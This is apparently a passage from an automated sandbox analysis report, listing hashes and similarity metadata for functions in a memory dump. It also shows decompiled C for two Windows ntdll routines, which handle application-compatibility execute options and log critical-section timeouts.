                                                        • API String ID:
                                                        • Opcode ID: 3ef376d54631cf2f479eeeb19058a053a3cab7dc76eab8022a2fca4f9c728a24
                                                        • Instruction ID: 587d57424e5b210f748b518887973f1602fda89171b2b9f02fdf8f98eea55351
                                                        • Opcode Fuzzy Hash: 3ef376d54631cf2f479eeeb19058a053a3cab7dc76eab8022a2fca4f9c728a24
                                                        • Instruction Fuzzy Hash: FF900271A15000129140719948146464006B7E0782B99C111A1508664CC9948B6A63E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829540 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29952b2c5c4ddfee4077dc8064b428b1325db27a4e3dcac9fdf0c9fda47c5d9b
                                                        • Instruction ID: af3d2a921e530baa40d6adf1b51a72dde0b1aea80bab1bd567784d9f4bf36aa5
                                                        • Opcode Fuzzy Hash: 29952b2c5c4ddfee4077dc8064b428b1325db27a4e3dcac9fdf0c9fda47c5d9b
                                                        • Instruction Fuzzy Hash: DA900265221000030105A59907045070046A7D5392395C121F2009660CD661897661A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829560 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b5aba3ca3fd70e60cd0ec87e70db7812c48b6668ac3649f81f66cfd7e4476d9
                                                        • Instruction ID: 93fbafe99a3832fac5079ddc4f725b5c3433a1c199226e4c9f9afa2575aeba82
                                                        • Opcode Fuzzy Hash: 3b5aba3ca3fd70e60cd0ec87e70db7812c48b6668ac3649f81f66cfd7e4476d9
                                                        • Instruction Fuzzy Hash: 04900265231000020145A599060450B0445B7D63923D5C115F240A6A0CC661897A63A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829780 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee74c35eba093abd02e066c9b43df73958ba2d9b0683f6fb22b1ad61e86adec0
                                                        • Instruction ID: f0c047b307db5f727da9e40f8492d4e7905431b9c709ff6e3baa81cd45a544ab
                                                        • Opcode Fuzzy Hash: ee74c35eba093abd02e066c9b43df73958ba2d9b0683f6fb22b1ad61e86adec0
                                                        • Instruction Fuzzy Hash: 5490026922300002D1807199540860A0005A7D1343FD5D515A1009668CC955897E63A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018297A0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82c61cb06e1b13ca9201a9dcdc8e88c3e2e28ac09eb86e823277cf9c03f9fa28
                                                        • Instruction ID: fd2d9c3b39d47c5aac0f66d423cd123b8232a6da95ed7be5c92064605e4c080e
                                                        • Opcode Fuzzy Hash: 82c61cb06e1b13ca9201a9dcdc8e88c3e2e28ac09eb86e823277cf9c03f9fa28
                                                        • Instruction Fuzzy Hash: 8C90026131100003D140719954186064005F7E1342F95D111E1408664CD955896B62A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829FE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f73d3161801ff4b39e5b8c9ca712b612199aaf822884b660159b43174433a318
                                                        • Instruction ID: 303d33d2532d44cd86017ba97e1f8f2c5d54ca53d0076536f0be2ae9f6cc8d6f
                                                        • Opcode Fuzzy Hash: f73d3161801ff4b39e5b8c9ca712b612199aaf822884b660159b43174433a318
                                                        • Instruction Fuzzy Hash: F490027132114402D110619984047060005A7D1342F95C511A1818668DC6D589A671A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829710 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 607a1b6f0f39d3245112821c7b162e9e475569044ff5e59847f1af4ecea7158b
                                                        • Instruction ID: aacc0ba7920919d7d2ce1a9397575a956cf4f835602fd13e2b7c55343c2d1dd3
                                                        • Opcode Fuzzy Hash: 607a1b6f0f39d3245112821c7b162e9e475569044ff5e59847f1af4ecea7158b
                                                        • Instruction Fuzzy Hash: CD90027121100402D10065D954086460005A7E0342F95D111A6018665EC6A589A671B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0182A710 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4862c263e52697179fef9dae9c355e5409d01b92083e23b1b258ff0d0fdf2773
                                                        • Instruction ID: 809dd9eeb811bcb0fdd1ac5a735c3b1da2d4950d03aeebc7756ff819d46ecb6a
                                                        • Opcode Fuzzy Hash: 4862c263e52697179fef9dae9c355e5409d01b92083e23b1b258ff0d0fdf2773
                                                        • Instruction Fuzzy Hash: 3B900271311000529500A6D95804A4A4105A7F0342B95D115A5008664CC594897661A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829730 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 585414a9487580956328329334866afd2554502ba7fe0b9f34d8875f246e834d
                                                        • Instruction ID: 77e147404ca70ba173fdd36b64b4c83a1da51a368fa1337062ce5332aa2ba40c
                                                        • Opcode Fuzzy Hash: 585414a9487580956328329334866afd2554502ba7fe0b9f34d8875f246e834d
                                                        • Instruction Fuzzy Hash: 7290026161500402D140719954187060015A7D0342F95D111A1018664DC6998B6A76E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829760 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 56e8b2a9e9aef2f4ad4bedb2b7bfc66207977583b58865efa67b24c8dd86d246
                                                        • Instruction ID: d70a4808422dabf34c84e92f32e1b398fcce0bc3734019a9fd3712418bec3842
                                                        • Opcode Fuzzy Hash: 56e8b2a9e9aef2f4ad4bedb2b7bfc66207977583b58865efa67b24c8dd86d246
                                                        • Instruction Fuzzy Hash: D190027121100403D100619955087070005A7D0342F95D511A1418668DD696896671A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829770 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9989eafa6ffc837eac01606111b35432f814704136f04f3c1e190aaaaadc2b92
                                                        • Instruction ID: 11bd2a2e650759cf5605e3493c6a76eebbdad85989da5471dbea2b957451e6be
                                                        • Opcode Fuzzy Hash: 9989eafa6ffc837eac01606111b35432f814704136f04f3c1e190aaaaadc2b92
                                                        • Instruction Fuzzy Hash: D790026121504442D10065995408A060005A7D0346F95D111A20586A5DC6758966B1B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0182A770 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f074d54b68d76a73dcbb6ae2d6c436d162955c43ec2b2be1aeb856bf8875dcd
                                                        • Instruction ID: 94d598775bfaf46e66ed30b6bd248d26e7151732bc34d15c90ca0ac056db1c0c
                                                        • Opcode Fuzzy Hash: 7f074d54b68d76a73dcbb6ae2d6c436d162955c43ec2b2be1aeb856bf8875dcd
                                                        • Instruction Fuzzy Hash: DB90027521504442D50065995804A870005A7D0346F95D511A14186ACDC6948976B1A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018296D0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8b39960e1e1dac55d1cf7d62f5cad714f23061070db32ba1e1ca1b072307390
                                                        • Instruction ID: 22770eaaf19fc1daee2c6a77d102d67525f968409a14c0106176f51e5d060536
                                                        • Opcode Fuzzy Hash: a8b39960e1e1dac55d1cf7d62f5cad714f23061070db32ba1e1ca1b072307390
                                                        • Instruction Fuzzy Hash: 6190027121100842D10061994404B460005A7E0342F95C116A1118764DC655C96675A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829610 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 657b939bba06bd26f08245388b94eb15fdddf1bbbbd2e204451ea857bd9e8954
                                                        • Instruction ID: 5e99bebd1fa47d4f50714ad3fa52ce1e79d43a160d4bf877cb2b527bf849864d
                                                        • Opcode Fuzzy Hash: 657b939bba06bd26f08245388b94eb15fdddf1bbbbd2e204451ea857bd9e8954
                                                        • Instruction Fuzzy Hash: 2190027161500802D150719944147460005A7D0342F95C111A1018764DC7958B6A76E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829650 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee2e834d69038c40cc13e47beed6526810ef662cdcfd5a751b4cc0ce650b5ef0
                                                        • Instruction ID: 6ece0bf03e3da1e14cc6458b826ca986e0213ca8855cac5034cc9197a89e824c
                                                        • Opcode Fuzzy Hash: ee2e834d69038c40cc13e47beed6526810ef662cdcfd5a751b4cc0ce650b5ef0
                                                        • Instruction Fuzzy Hash: 3590027121504842D14071994404A460015A7D0346F95C111A10587A4DD6658E6AB6E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: 8dac014d643c5fdfaf9bba163b19056e6c945563fc60a8dde95f9913d1371ef5
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E40FD Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 63%
                                                        			E017E40FD(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x18dd360 ^ _t107;
				_v8 =  *0x18dd360 ^ _t107;
				_t105 = __ecx;
				if( *0x18d84d4 == 0) {
					L5:
					return E0182B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E017FE9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					_t49 = E017E42EB(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E017E41EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E018296C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					_t55 = E017E429E(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v556 - _t85;
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E01875720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						E0182FA60( &_v548, 0, 0x214);
						_t106 =  *0x18d84d4;
						_t110 = _t108 + 0x20;
						 *0x18db1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x18d84d4))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E0182B75A();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E01875720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E01831480( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E01875720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v556 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E01831150(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E01875720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E01863E13(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v556;
							} while (_t106 < _v556);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E01875720();
						goto L15;
					}
					L8:
					_t56 = E017E41F7(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                        0x017e410d
                                                        0x017e410f
                                                        0x017e411c
                                                        0x017e411e
                                                        0x017e4158
                                                        0x017e4168
                                                        0x017e4168
                                                        0x017e4126
                                                        0x017e4130
                                                        0x017e413c
                                                        0x018404a2
                                                        0x017e4142
                                                        0x017e414b
                                                        0x017e414b
                                                        0x017e414f
                                                        0x017e416b
                                                        0x017e4171
                                                        0x017e4176
                                                        0x017e4178
                                                        0x017e41d0
                                                        0x017e41d2
                                                        0x017e41d3
                                                        0x017e41a7
                                                        0x017e41ae
                                                        0x017e41b0
                                                        0x017e41db
                                                        0x017e41b2
                                                        0x017e41b8
                                                        0x017e41bf
                                                        0x017e41c1
                                                        0x017e41c1
                                                        0x017e41c1
                                                        0x017e41c3
                                                        0x017e41c5
                                                        0x017e41df
                                                        0x017e41e2
                                                        0x017e41e2
                                                        0x017e41c7
                                                        0x017e41c9
                                                        0x01840628
                                                        0x01840628
                                                        0x01840630
                                                        0x01840631
                                                        0x01840633
                                                        0x01840635
                                                        0x01840635
                                                        0x00000000
                                                        0x017e41c9
                                                        0x017e417d
                                                        0x017e4183
                                                        0x017e4189
                                                        0x017e418e
                                                        0x017e4190
                                                        0x018404a9
                                                        0x018404af
                                                        0x00000000
                                                        0x00000000
                                                        0x018404b5
                                                        0x018404c8
                                                        0x018404d5
                                                        0x018404e5
                                                        0x018404ea
                                                        0x018404f6
                                                        0x01840518
                                                        0x0184051e
                                                        0x01840520
                                                        0x01840522
                                                        0x00000000
                                                        0x00000000
                                                        0x01840528
                                                        0x0184052e
                                                        0x01840530
                                                        0x00000000
                                                        0x00000000
                                                        0x0184053b
                                                        0x0184053d
                                                        0x00000000
                                                        0x00000000
                                                        0x01840545
                                                        0x0184054c
                                                        0x0184054e
                                                        0x01840623
                                                        0x00000000
                                                        0x01840623
                                                        0x01840556
                                                        0x01840557
                                                        0x0184056f
                                                        0x01840574
                                                        0x01840583
                                                        0x0184058a
                                                        0x0184058b
                                                        0x0184058d
                                                        0x018405b5
                                                        0x018405c0
                                                        0x018405c6
                                                        0x018405c8
                                                        0x018405cb
                                                        0x018405cd
                                                        0x018405d3
                                                        0x018405d5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018405db
                                                        0x018405db
                                                        0x018405e3
                                                        0x018405e7
                                                        0x018405e9
                                                        0x018405eb
                                                        0x018405ed
                                                        0x018405ed
                                                        0x018405fa
                                                        0x018405ff
                                                        0x01840606
                                                        0x0184060b
                                                        0x0184060d
                                                        0x00000000
                                                        0x00000000
                                                        0x01840613
                                                        0x01840613
                                                        0x01840616
                                                        0x01840616
                                                        0x00000000
                                                        0x0184061e
                                                        0x0184058f
                                                        0x01840594
                                                        0x01840596
                                                        0x01840598
                                                        0x00000000
                                                        0x0184059d
                                                        0x017e4196
                                                        0x017e4198
                                                        0x017e419d
                                                        0x017e419f
                                                        0x00000000
                                                        0x00000000
                                                        0x017e41a1
                                                        0x00000000
                                                        0x017e4151
                                                        0x017e4151
                                                        0x017e4151
                                                        0x00000000
                                                        0x017e4151

                                                        Strings
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018405AC
                                                        • Execute=1, xrefs: 0184057D
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0184058F
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01840566
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018404BF
                                                        • ExecuteOptions, xrefs: 0184050A
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 018405F1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 544966f6cbde8a6800635f28ccb6b5c4f50d5143fab90ef589f9eac4c65c9660
                                                        • Instruction ID: 2d8a977b5951b2c187b89cbe0dafe380c2bbb026b0b839015cabf3a0310831ca
                                                        • Opcode Fuzzy Hash: 544966f6cbde8a6800635f28ccb6b5c4f50d5143fab90ef589f9eac4c65c9660
                                                        • Instruction Fuzzy Hash: A06117717002197BEF21EA98DC89FAAB7F9EF68745F04009DE606E7181DA70DB418F61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0187FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E0187FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0182CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01875720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01875720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                        0x0187fdda
                                                        0x0187fde2
                                                        0x0187fde5
                                                        0x0187fdec
                                                        0x0187fdfa
                                                        0x0187fdff
                                                        0x0187fe0a
                                                        0x0187fe0f
                                                        0x0187fe17
                                                        0x0187fe1e
                                                        0x0187fe19
                                                        0x0187fe19
                                                        0x0187fe19
                                                        0x0187fe20
                                                        0x0187fe21
                                                        0x0187fe22
                                                        0x0187fe25
                                                        0x0187fe40

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187FDFA
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0187FE2B
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0187FE01
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        • Opcode ID: bf718a8d1b3cddae8705d81b8628ba62e9d024240d1b1ec9b508b3093880ff39
                                                        • Instruction ID: f4e4d684d3f02a3005d0961ed025cb2f4cfd2745ca881b97eadb802e52f3ef5f
                                                        • Opcode Fuzzy Hash: bf718a8d1b3cddae8705d81b8628ba62e9d024240d1b1ec9b508b3093880ff39
                                                        • Instruction Fuzzy Hash: E1F0FC721005017FD7201A5ADC01F33BF6ADB44770F140314F728951D1DA62F96097F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%